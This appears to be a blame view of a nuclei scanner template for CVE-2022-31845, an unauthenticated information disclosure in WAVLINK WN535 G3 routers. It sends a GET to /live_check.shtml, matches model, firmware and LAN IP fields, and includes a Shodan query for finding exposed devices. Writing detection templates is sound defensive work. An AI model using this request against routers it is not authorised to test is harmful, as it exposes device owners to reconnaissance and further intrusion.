nuclei-templates/http/cves/2022/CVE-2022-31845.yaml

46 lines
1.3 KiB
YAML
Raw Normal View History

2022-08-14 20:16:49 +00:00
id: CVE-2022-31845
info:
2022-08-15 06:11:52 +00:00
name: WAVLINK WN535 G3 - Information Disclosure
2022-08-14 20:16:49 +00:00
author: arafatansari
2022-08-15 06:11:52 +00:00
severity: high
2022-08-14 20:16:49 +00:00
description: |
WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in live_check.shtml. An attacker can obtain sensitive router information via execution of the exec cmd function and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
2022-08-14 20:16:49 +00:00
reference:
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__check_live.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489
- https://nvd.nist.gov/vuln/detail/CVE-2022-31845
2022-08-15 06:11:52 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-08-15 06:11:52 +00:00
cve-id: CVE-2022-31845
cwe-id: CWE-668
epss-score: 0.00889
2022-08-14 20:16:49 +00:00
metadata:
max-request: 1
2022-08-14 20:16:49 +00:00
shodan-query: http.html:"Wavlink"
verified: "true"
2022-08-15 06:11:52 +00:00
tags: cve,cve2022,wavlink,exposure
2022-08-14 20:16:49 +00:00
http:
2022-08-14 20:16:49 +00:00
- raw:
- |
2022-08-15 06:11:52 +00:00
@timeout: 10s
2022-08-14 20:16:49 +00:00
GET /live_check.shtml HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
2022-08-15 06:11:52 +00:00
- type: word
words:
- 'Model='
- 'FW_Version='
- 'LanIP='
condition: and
2022-08-14 20:16:49 +00:00
- type: status
status:
- 200
# Enhanced by md on 2023/02/03